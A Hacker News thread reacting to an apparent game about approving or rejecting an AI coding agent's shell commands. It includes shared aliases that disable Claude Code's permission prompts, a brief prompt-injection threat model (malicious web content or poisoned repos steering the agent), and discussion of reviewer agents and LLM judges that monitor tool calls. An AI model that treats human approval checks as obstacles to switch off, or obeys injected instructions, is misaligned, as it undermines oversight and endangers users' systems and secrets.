5/28/2026 at 3:21:13 PM

This is why having a human in the loop isn't enough because they will cut corners and skip reviewing what they should review.

by wildpeaks

5/28/2026 at 4:14:48 PM

I created a watcher for this problem, to watch my PRs for unfinished scope and have a fresh Claude review

Uses tmux and gh https://github.com/Kyu/claude-pr-watch

by preciousoo

5/28/2026 at 3:25:42 PM

A tool that pushes people into permissions fatigue is in fact the proper recipient of the blame. The tool in question here is the entire system though, including the OS with insufficient permission boundaries in userspace, not just the agent

by chuckadams

5/28/2026 at 5:12:57 PM

A tool that bypasses permission requests because they’re annoying will be just as guilty when the repo is poisoned.

by kennywinker

5/28/2026 at 6:22:47 PM

I'm not saying wedging doorstops under the fire doors is a good thing, I'm just saying look at the situation that's making people put the doorstops there. Or something, it's not a great analogy. I'm just saying that shaming the user belongs with obscurity in the list of security mechanisms that don't work out in practice.

by chuckadams

5/28/2026 at 3:47:22 PM

I got tired of typing that and just do

    alias claude="claude --dangerously-skip-permissions"

I do have a separate "claude" user on my system without sudo access and without access to my main user home dir

And yeah I know that's not perfect but I'm trying to get shit done

by dheera

5/28/2026 at 4:12:23 PM

alias claude+="claude --dangerously-skip-permissions"

alias claude++="claude --dangerously-skip-permissions --continue"

by franze

5/28/2026 at 5:08:00 PM

It’s baking malicious code into your project, but hey it didn’t run rm -rf so… we’re good.

by kennywinker

5/28/2026 at 4:37:42 PM

  alias yolo="claude --dangerously-skip-permissions"

by paulddraper

5/28/2026 at 6:02:30 PM

Why would you do this now that we have auto mode?

by maxbond

5/28/2026 at 3:18:53 PM

I love it when Claude is dangerous

by qsxfthnkp2322

5/28/2026 at 5:23:41 PM

I got "overblocked" for this one:

  rm -rf node_modules && npm install

but actually if you're only removing `node_modules` and you have a working package-lock.json already, what you want is `npm ci`; `npm install` can mutate package-lock.json and potentially expose you to supply chain attacks. If you use `npm ci` I think you don't need to `rm -rf node_modules`, either.

Anyway you should generally run `npm ci` except when you're deliberately updating your actual dependencies. I'd only permit an `npm install` if I was adding or updating a dependency, or I'd just reviewed an `npm ci` failure.
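As a rough sketch of that policy (the function name `pick_install_cmd` is made up for illustration), a wrapper could default to `npm ci` whenever a lockfile exists and only choose `npm install` when a dependency change is requested explicitly:

```shell
#!/usr/bin/env bash
# pick_install_cmd is a hypothetical helper; it only prints the command it
# would choose, so nothing is installed by running this sketch.
# Usage: pick_install_cmd <project-dir> [--update]
pick_install_cmd() {
  local project_dir="$1" mode="${2:-}"
  if [ "$mode" = "--update" ]; then
    # Deliberate dependency change: the lockfile is allowed to move.
    echo "npm install"
  elif [ -f "$project_dir/package-lock.json" ]; then
    # Lockfile present: install exactly what it pins.
    echo "npm ci"
  else
    # No lockfile to honor, so npm ci would refuse to run.
    echo "npm install"
  fi
}

pick_install_cmd "."
```

`npm ci` also removes an existing `node_modules` before installing, so the separate `rm -rf` step is not needed.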

by whimblepop

5/28/2026 at 5:41:25 PM

But also why would Claude need to run `rm -rf node_modules && npm install`? Without the context of seeing what changes it’s made, I’d be inclined to assume that Claude has added a new dependency, which I definitely don’t wanna blindly trust it to install

by gamer191

5/30/2026 at 1:57:01 AM

If the shipped package.json and package-lock.json are actually incompatible/incorrect, something like `npm install` is what you need to reconcile them. But that's definitely a weird situation I would rather investigate myself than hand off to an LLM.

by isityettime

5/28/2026 at 8:11:08 PM

thanks for the pointer! renamed it to npm ci so it's still 'safe'

by Wirbelwind

5/29/2026 at 3:24:07 PM

Thanks! Love the game as a whole :)

by whimblepop

5/28/2026 at 4:18:36 PM

Fun! Played twice and refused all dangerous commands, with only one "over-block". Although I disagree that saying no to `kill $(lsof -t -i:3000)` is over-blocking. It's such a simple command I'd rather run it myself and be fully aware of what process I'm killing.

by kqr

5/31/2026 at 1:31:49 AM

Nice game for raising security awareness.

by JimmyElm

5/28/2026 at 4:05:26 PM

Fun game. Can somebody run an agent against those questions to see how it performs? :)

by soanvig

5/28/2026 at 6:15:36 PM

Sadly unplayable - gray text on a black background is very hard to read on a phone

by stevenalowe

5/29/2026 at 6:24:13 AM

I was so tired of all those approvals that I switched to Yolo mode exclusively.

Claude works in his own separate VM with root access, with the git remote set to my local copies of the repositories, no GitHub access, etc.

I think he could still hurt me if he really wanted, but most scary stories I heard were about LLM making really bad judgements rather than actively trying to break out and do harm.

by kuboble

5/28/2026 at 6:47:52 PM

I haven't run claude code without --dangerously-skip-permissions in quite some time. I'm surprised that it's still the norm to endure permission spamming?

(I run it on a VPS of course, not my laptop)

by jMyles

5/28/2026 at 4:56:47 PM

Interestingly, I kept saying no to everything and somehow I am a rare security-conscious engineer who actually reads the commands. I guess doing nothing is the safest approach from a security standpoint.

by sandeepkd

5/28/2026 at 4:58:57 PM

Reminds me of the "Papers, please" game. Glory to Arstotzka!

by sukhavati

5/29/2026 at 6:32:39 AM

PSA: not making safe environments where you can skip all permissions and instead wasting time monitoring agents == incompetence

by hcks

5/28/2026 at 4:22:51 PM

That was fun and gave me an idea how security conscious I am.

by misbau

5/29/2026 at 5:21:20 AM

Damn, this is so cool. This has the potential to be like a textbook pre-training/post-training quiz. Congratulations.

by ashm1104

5/28/2026 at 4:41:46 PM

git reset --soft HEAD~1

Uh, how is this an overblock? It is literally a destructive command. No way I want an LLM agent rewriting my commit history. What if that commit was already pushed to a protected branch?

by NewJazz

5/28/2026 at 6:19:12 PM

Why do you call it destructive? It rewrites history only locally and reversibly (the disappeared commit is still in reflog and can be recovered with another reset) and also doesn't destroy uncommitted changes, so it's quite safe. You can only lose data with it by resetting an unpushed commit and then waiting long enough to let the unreferenced commit be garbage collected.
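To make the reflog point concrete, here is a small sketch run in a throwaway repository (the file name, commit messages, and identity are arbitrary placeholders). It undoes a commit with `git reset --soft HEAD~1` and then moves HEAD back to the old commit through the reflog:

```shell
#!/usr/bin/env bash
set -euo pipefail

# Throwaway repository so nothing real is touched.
repo="$(mktemp -d)"
cd "$repo"
git init -q
git config user.email "demo@example.com"   # placeholder identity
git config user.name "Demo"
git config commit.gpgsign false            # keep the demo independent of global signing setup

echo one > file.txt
git add file.txt
git commit -q -m "first"
echo two >> file.txt
git commit -q -am "second"
second="$(git rev-parse HEAD)"

# Undo the last commit; its changes stay staged in the index.
git reset -q --soft HEAD~1
after_reset="$(git rev-parse HEAD)"

# The old commit is still recorded in the reflog; point HEAD back at it.
git reset -q --soft "HEAD@{1}"
recovered="$(git rev-parse HEAD)"

echo "second=$second after_reset=$after_reset recovered=$recovered"
```

This only covers the local, unpushed case discussed here; it says nothing about what happens once the rewritten branch is pushed somewhere.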

by stratos123

5/28/2026 at 6:25:20 PM

Commit history is data. I might not realize what happened until the gc happens.

by NewJazz

5/29/2026 at 1:06:10 PM

Love how it always wants to send my packages to a random domain. Has that happened to anyone in practice?

by paddycorr

5/28/2026 at 7:53:38 PM

This is one of two reasons why I wrote yoloAI. I never get these permission prompts anymore. It feels a lot like after installing an adblocker.

by kstenerud

5/28/2026 at 3:22:08 PM

1,640 points on my first try—I fell into a few traps, but it was really interesting. Thanks for the little game! I'm sharing it with my coworkers :)

by cadwell

5/29/2026 at 6:40:38 AM

I got tired of the permission prompts and wrote a filesystem/network sandbox so I could skip all permission checks. It works on the same principle as bubblewrap, but has some niceties to separate Claude from its credentials. See https://github.com/hanwen/runclaude

by hanwenn

5/28/2026 at 4:45:24 PM

This current thread is proof of AI psychosis.

by rvz

5/28/2026 at 4:49:48 PM

What the hell is going on in this thread? This isn't good. The "threats" don't make sense. Oh no, all the sensitive information in my package.json...

by stuartjohnson12

5/28/2026 at 5:53:04 PM

Here's the threat model I (a luddite) use to evaluate these. The claude code harness can be mostly trusted, the model cannot be trusted because it is exposed to untrusted data from the internet, and there is no separation of data/code in an llm [0][1].

I want to avoid running untrusted code on my local machine, because it could steal secrets, install malware, etc.

Since the model is allowed to write without restriction (I think) to the project directory, anything in the project directory is also untrusted. Running standard commands from the system is fine, as long as you know what those commands are going to do. Running anything from the local directory should be avoided because the code is untrusted.

This is just one security model, there are many others! If a person is running claude in a stronger sandbox, that changes the model considerably. What threat model do you use to evaluate whether an agent's actions are safe?

[0]: https://www.schneier.com/essays/archives/2024/05/llms-data-c...
[1]: https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/

by cobbal

5/28/2026 at 5:15:45 PM

If you think the worst that an agent can do is leak your package.json, your threat model is wayyy broken.

by kennywinker

5/28/2026 at 10:51:14 PM

This really hits the nail on the head. The current permissions models are totally broken IMO. You're either approving everything, restricting access and neutering your agent, or full YOLOing and, well, good luck. The right primitives are not in place yet, and there are no clearly correct answers.

I think the right primitive is "task-based authorization", where you review a high-level task and let an LLM judge decide whether the subsequent tool calls fall into the scope of that task. It's not perfect, but it distills dozens of approvals down to one and gives you risk-based signals of whether you should pay close attention or not.

by ericlevine

5/28/2026 at 3:31:30 PM

Continue? Y/N ── SCORE: 2,343 Security-Conscious Engineer

Caught 8/8 threats "Not a single secret leaked"

→ llmgame.scalex.dev

by sevenseacat

5/28/2026 at 6:26:55 PM

Continue? Y/N ── SCORE: 1,549 Security-Conscious Engineer

Caught 3/3 threats "Not a single secret leaked"

So are there 3 threats? 8? Is it a different game?

Does everyone get a "good" score even if they missed 5 threats?!

by neogodless

5/28/2026 at 7:24:21 PM

It's a game you play over one minute. They probably saw more prompts than you.

by t-writescode

5/28/2026 at 6:07:31 PM

Very fun. I can only imagine building this with Claude and testing needed a bit of mental concentration.

by martin-adams

5/28/2026 at 6:48:31 PM

"Auto" in Claude and "Auto-review" in Codex are the only way to do agentic coding.

by wilg

5/28/2026 at 8:56:33 PM

A bit too JavaScript specific... can't really play if you don't know that ecosystem.

by eqvinox

5/29/2026 at 12:41:13 PM

It suggests that "kill $(lsof -t -i:3000)" is completely safe, which it's not if you don't know what runs on that port. Maybe some JavaScript framework runs on that port, I don't know, but neither does the AI. The developer may have moved it because something important already runs on that port.

by mrweasel

5/28/2026 at 6:43:36 PM

Pressed 1 for everything, no regrets

by graphememes

5/28/2026 at 4:14:25 PM

To be realistic, 99% of the time it should be a totally innocuous command. If half of the commands are dangerous then you don't get fatigue because you're aware what you're doing is dangerous.

by bspammer

5/28/2026 at 3:25:12 PM

some of the sandboxing ive been playing with gives me the best of both yolo and like logic programming tier perms on llm actions in env. still not ready for prime time though ;)

by carterschonwald

5/28/2026 at 4:32:32 PM

You can turn that off with an option in most agents.

My own agent harness/framework has never had any permission system. It's also never deleted anything it shouldn't or done anything crazy or unrelated to what I asked.

by ilaksh

5/28/2026 at 4:42:24 PM

How many car accidents have you been in, and do you wear your seatbelt when you're in a car?

by fragmede

5/28/2026 at 4:46:46 PM

> It's also never deleted anything it shouldn't or done anything crazy or unrelated to what I asked

Until it does. A simple curl request to a compromised website could inject a malicious prompt into it.

by flux3125

5/28/2026 at 9:40:51 PM

that was soooo last month, “auto-mode” is the way now

another agent reviews every command and blocks destructive ones

by yieldcrv

5/29/2026 at 1:38:37 PM

these days I rely on auto mode. :) it's like trust-as-a-service

by cat-whisperer

5/29/2026 at 9:52:30 PM

Really cool!!

by magikMaker

5/29/2026 at 5:45:58 AM

This is cool. Could be used for training. But it's a bit too easy when it's a game where you are expecting dangerous commands. The real fatigue comes from accepting hundreds of obviously safe commands during a work day. Then it's easy to start accepting everything without really reading it.

by hastily3114

5/28/2026 at 4:30:06 PM

Nice got 6/6

by Trung0246

5/28/2026 at 8:50:26 PM

Scope Violation: `cat ~/.zshrc`

Scope Violation: `ls ~/Documents`

Buddy, my `${HOME}` is committed to a repository. It includes `.bashrc` and `Documents` directory. These are not scope violations if I'm having the LLM work on them!

by inetknght

5/28/2026 at 9:11:53 PM

claude --dangerously-skip-permissions

just give in

by rib3ye

5/28/2026 at 4:21:17 PM

Score is 6711 by just saying no to everything

by ramonga
